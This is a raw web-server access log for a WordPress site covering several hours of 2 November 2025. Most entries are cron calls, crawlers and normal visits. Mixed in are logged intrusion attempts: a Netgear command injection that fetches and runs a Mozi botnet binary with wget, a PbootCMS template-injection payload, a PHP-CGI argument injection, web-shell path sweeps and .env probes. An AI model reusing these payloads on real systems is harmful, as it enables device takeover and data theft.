180.153.236.136 - - [02/Nov/2025:13:55:08 +0800] "GET / HTTP/1.1" 200 33931 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [02/Nov/2025:14:11:15 +0800] "POST /wp-cron.php?doing_wp_cron=1762063875.1092460155487060546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.182.138 - - [02/Nov/2025:14:11:15 +0800] "GET /login.rsp HTTP/1.1" 301 5 "-" "Hello World"
134.209.169.174 - - [02/Nov/2025:14:11:39 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
36.133.115.36 - - [02/Nov/2025:14:16:11 +0800] "POST /wp-cron.php?doing_wp_cron=1762064171.5995090007781982421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.163.104.54 - - [02/Nov/2025:14:16:11 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Nov/2025:14:23:09 +0800] "POST /wp-cron.php?doing_wp_cron=1762064589.5865759849548339843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.12.58 - - [02/Nov/2025:14:23:09 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.153.12.58 - - [02/Nov/2025:14:23:12 +0800] "GET / HTTP/1.1" 200 33466 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Nov/2025:14:24:40 +0800] "POST /wp-cron.php?doing_wp_cron=1762064679.9748969078063964843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.52.252.229 - - [02/Nov/2025:14:24:40 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
121.52.252.229 - - [02/Nov/2025:14:24:40 +0800] "GET / HTTP/1.0" 200 153652 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
36.133.115.36 - - [02/Nov/2025:14:50:08 +0800] "POST /wp-cron.php?doing_wp_cron=1762066208.6383740901947021484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
128.199.48.21 - - [02/Nov/2025:14:50:08 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"
36.133.115.36 - - [02/Nov/2025:14:58:56 +0800] "POST /wp-cron.php?doing_wp_cron=1762066736.8836879730224609375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
83.217.72.249 - - [02/Nov/2025:14:58:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [02/Nov/2025:15:17:35 +0800] "POST /wp-cron.php?doing_wp_cron=1762067855.9219830036163330078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.60.131 - - [02/Nov/2025:15:17:35 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.130.60.131 - - [02/Nov/2025:15:17:37 +0800] "GET / HTTP/1.1" 200 33467 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Nov/2025:15:23:13 +0800] "POST /wp-cron.php?doing_wp_cron=1762068193.3787219524383544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.157 - - [02/Nov/2025:15:23:13 +0800] "GET /category/uncategorized/ HTTP/1.1" 301 66223 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [02/Nov/2025:15:31:58 +0800] "POST /wp-cron.php?doing_wp_cron=1762068718.8746979236602783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.45.248.83 - - [02/Nov/2025:15:31:58 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"
36.133.115.36 - - [02/Nov/2025:15:33:35 +0800] "POST /wp-cron.php?doing_wp_cron=1762068815.5883738994598388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
157.90.139.38 - - [02/Nov/2025:15:33:36 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [02/Nov/2025:15:58:53 +0800] "POST /wp-cron.php?doing_wp_cron=1762070333.8945810794830322265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.15.164.165 - - [02/Nov/2025:15:58:53 +0800] "GET /developmentserver/metadatauploader HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [02/Nov/2025:16:10:44 +0800] "POST /wp-cron.php?doing_wp_cron=1762071044.5641160011291503906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
51.210.102.98 - - [02/Nov/2025:16:10:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
36.133.115.36 - - [02/Nov/2025:16:40:55 +0800] "POST /wp-cron.php?doing_wp_cron=1762072855.7615039348602294921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
67.205.34.113 - - [02/Nov/2025:16:40:56 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [02/Nov/2025:16:45:16 +0800] "POST /wp-cron.php?doing_wp_cron=1762073116.0437679290771484375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.212.245.238 - - [02/Nov/2025:16:45:16 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://102.33.68.250:49521/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31368 "-" "-"
36.133.115.36 - - [02/Nov/2025:16:49:34 +0800] "POST /wp-cron.php?doing_wp_cron=1762073374.9003970623016357421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.249.100.47 - - [02/Nov/2025:16:49:34 +0800] "GET /wp-content/uploads/2025/07/1753453096-%CB%AB%CF%E0%B8%D6product_Single600%A1%C1284.webp HTTP/1.1" 404 31381 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
220.181.51.113 - - [02/Nov/2025:16:49:34 +0800] "GET /wp-content/uploads/2025/07/1753456770-%C8%C8%B6%C6%D0%BF%BE%EDproduct_Single600.webp HTTP/1.1" 404 31381 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
220.181.51.92 - - [02/Nov/2025:16:49:35 +0800] "GET /wp-content/uploads/2025/07/1753456723-%CB%AB%CF%E0%B8%D6roduct_Single600.webp HTTP/1.1" 404 31381 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
220.181.51.90 - - [02/Nov/2025:16:49:35 +0800] "GET /wp-content/uploads/2025/07/1753453127-%D3%E0%BE%EDproduct_Single600%A1%C1284.webp HTTP/1.1" 404 31381 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
36.133.115.36 - - [02/Nov/2025:16:52:43 +0800] "POST /wp-cron.php?doing_wp_cron=1762073563.2034800052642822265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
62.210.64.72 - - [02/Nov/2025:16:52:43 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0"
36.133.115.36 - - [02/Nov/2025:16:52:55 +0800] "POST /wp-cron.php?doing_wp_cron=1762073575.4526550769805908203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.212.251.69 - - [02/Nov/2025:16:52:55 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0"
36.133.115.36 - - [02/Nov/2025:17:13:02 +0800] "POST /wp-cron.php?doing_wp_cron=1762074782.7781710624694824218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
95.154.198.138 - - [02/Nov/2025:17:13:03 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
216.24.219.92 - - [02/Nov/2025:17:25:15 +0800] "GET /style.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:15 +0800] "GET /wp-content/style.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:15 +0800] "GET /wp-content/themes/style.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:16 +0800] "GET /wp-admin/style.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:16 +0800] "GET /wp-includes/style.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:17 +0800] "GET /chosen.php?p= HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:17 +0800] "GET /file.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:18 +0800] "GET /flower.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:18 +0800] "GET /gifclass.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:19 +0800] "GET /bless.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:19 +0800] "GET /class-t.api.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:20 +0800] "GET /blurbs.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:20 +0800] "GET /akcc.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:21 +0800] "GET /abcd.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:21 +0800] "GET /shelp.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:22 +0800] "GET /cord.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:22 +0800] "GET /dex.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
36.133.115.36 - - [02/Nov/2025:17:25:25 +0800] "POST /wp-cron.php?doing_wp_cron=1762075525.6014840602874755859375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
216.24.219.92 - - [02/Nov/2025:17:25:25 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:26 +0800] "GET /file2.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:26 +0800] "GET //zwso.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:26 +0800] "GET /wp-admin/zwso.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:27 +0800] "GET /wp-content/plugins/hellopress/wp_mna.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:27 +0800] "GET /bolt.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:27 +0800] "GET /shlo.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:28 +0800] "GET /133.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:28 +0800] "GET /ahax.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:28 +0800] "GET /php8.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:29 +0800] "GET /lufix1.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:29 +0800] "GET /witmm.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:29 +0800] "GET /wp-admin/css/index.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:30 +0800] "GET /wp-content/plugins/index.php HTTP/1.1" 200 31 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:30 +0800] "GET /wp-content/index.php HTTP/1.1" 200 31 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:31 +0800] "GET /files.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
216.24.219.92 - - [02/Nov/2025:17:25:31 +0800] "GET /wp-editor.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
36.133.115.36 - - [02/Nov/2025:17:31:36 +0800] "POST /wp-cron.php?doing_wp_cron=1762075896.4885299205780029296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.104.208.183 - - [02/Nov/2025:17:31:36 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0"
36.133.115.36 - - [02/Nov/2025:17:32:15 +0800] "POST /wp-cron.php?doing_wp_cron=1762075935.6706709861755371093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
196.251.73.166 - - [02/Nov/2025:17:32:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
196.251.73.166 - - [02/Nov/2025:17:32:17 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
36.133.115.36 - - [02/Nov/2025:17:35:33 +0800] "POST /wp-cron.php?doing_wp_cron=1762076133.8403019905090332031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.27.244 - - [02/Nov/2025:17:35:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.155.27.244 - - [02/Nov/2025:17:35:39 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Nov/2025:17:43:59 +0800] "POST /wp-cron.php?doing_wp_cron=1762076639.0152978897094726562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
167.172.190.211 - - [02/Nov/2025:17:43:59 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [02/Nov/2025:17:50:30 +0800] "POST /wp-cron.php?doing_wp_cron=1762077030.3181540966033935546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.182.138 - - [02/Nov/2025:17:50:30 +0800] "GET /login.rsp HTTP/1.1" 301 5 "-" "Hello World"
36.133.115.36 - - [02/Nov/2025:17:58:25 +0800] "POST /wp-cron.php?doing_wp_cron=1762077505.5633308887481689453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.125 - - [02/Nov/2025:17:58:25 +0800] "HEAD /login.rsp HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8"
38.175.215.9 - - [02/Nov/2025:18:14:19 +0800] "GET /rjew.php HTTP/1.1" 404 27 "http://cqqizhou.com/rjew.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19"
36.133.115.36 - - [02/Nov/2025:18:14:20 +0800] "POST /wp-cron.php?doing_wp_cron=1762078460.4397959709167480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
38.175.215.9 - - [02/Nov/2025:18:14:20 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 3.5.30729)"
38.175.215.9 - - [02/Nov/2025:18:14:21 +0800] "GET /ytmz.php HTTP/1.1" 404 27 "http://cqqizhou.com/ytmz.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
38.175.215.9 - - [02/Nov/2025:18:14:21 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729)"
38.175.215.9 - - [02/Nov/2025:18:14:23 +0800] "POST / HTTP/1.1" 200 151919 "http://cqqizhou.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; ja-jp) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
38.175.215.9 - - [02/Nov/2025:18:14:24 +0800] "GET /lbvh.php HTTP/1.1" 404 27 "http://cqqizhou.com/lbvh.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; zh-tw) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
38.175.215.9 - - [02/Nov/2025:18:14:25 +0800] "POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1" 404 31381 "http://cqqizhou.com/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13"
36.133.115.36 - - [02/Nov/2025:18:14:59 +0800] "POST /wp-cron.php?doing_wp_cron=1762078499.8782720565795898437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.119 - - [02/Nov/2025:18:14:59 +0800] "HEAD /.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
36.133.108.125 - - [02/Nov/2025:18:15:13 +0800] "HEAD /api/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0"
36.133.115.36 - - [02/Nov/2025:18:18:05 +0800] "POST /wp-cron.php?doing_wp_cron=1762078685.5973720550537109375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
64.227.76.238 - - [02/Nov/2025:18:18:05 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
14.215.163.132 - - [02/Nov/2025:18:18:24 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Nov/2025:18:19:15 +0800] "POST /wp-cron.php?doing_wp_cron=1762078755.3648149967193603515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
38.175.215.9 - - [02/Nov/2025:18:19:15 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://36.133.115.36/index.php?s=captcha" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24"
38.175.215.9 - - [02/Nov/2025:18:19:16 +0800] "GET /ypz.php HTTP/1.1" 404 27 "http://36.133.115.36/ypz.php" "Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.24"
38.175.215.9 - - [02/Nov/2025:18:19:17 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://36.133.115.36/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506)"
38.175.215.9 - - [02/Nov/2025:18:19:17 +0800] "GET /azav.php HTTP/1.1" 404 27 "http://36.133.115.36/azav.php" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10"
38.175.215.9 - - [02/Nov/2025:18:19:18 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://36.133.115.36/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)"
38.175.215.9 - - [02/Nov/2025:18:19:19 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://36.133.115.36/index.php?s=captcha" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MS-RTC LM 8)"
38.175.215.9 - - [02/Nov/2025:18:19:21 +0800] "GET /toty.php HTTP/1.1" 404 27 "http://36.133.115.36/toty.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4"
38.175.215.9 - - [02/Nov/2025:18:19:21 +0800] "POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1" 404 31381 "http://36.133.115.36/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.0 (.NET CLR 3.5.30729)"
38.175.215.9 - - [02/Nov/2025:18:19:22 +0800] "GET /cbhw.php HTTP/1.1" 404 27 "http://36.133.115.36/cbhw.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.4 Safari/532.2"
38.175.215.9 - - [02/Nov/2025:18:19:23 +0800] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "http://36.133.115.36/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-LI; rv:1.9.0.16) Gecko/2009120208 Firefox/3.0.16 (.NET CLR 3.5.30729)"
36.133.115.36 - - [02/Nov/2025:18:21:38 +0800] "POST /wp-cron.php?doing_wp_cron=1762078898.3784620761871337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
129.226.213.145 - - [02/Nov/2025:18:21:38 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [02/Nov/2025:18:48:46 +0800] "POST /wp-cron.php?doing_wp_cron=1762080526.4887499809265136718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
178.254.29.247 - - [02/Nov/2025:18:48:46 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"
36.133.115.36 - - [02/Nov/2025:18:54:26 +0800] "POST /wp-cron.php?doing_wp_cron=1762080866.3741300106048583984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
157.90.139.38 - - [02/Nov/2025:18:54:26 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [02/Nov/2025:19:19:43 +0800] "POST /wp-cron.php?doing_wp_cron=1762082383.8569209575653076171875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
74.249.128.83 - - [02/Nov/2025:19:19:43 +0800] "GET /hudson HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [02/Nov/2025:19:21:50 +0800] "POST /wp-cron.php?doing_wp_cron=1762082510.7164568901062011718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [02/Nov/2025:19:21:51 +0800] "GET / HTTP/1.1" 200 151919 "http://36.133.115.36:80/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [02/Nov/2025:19:31:28 +0800] "POST /wp-cron.php?doing_wp_cron=1762083088.7504808902740478515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
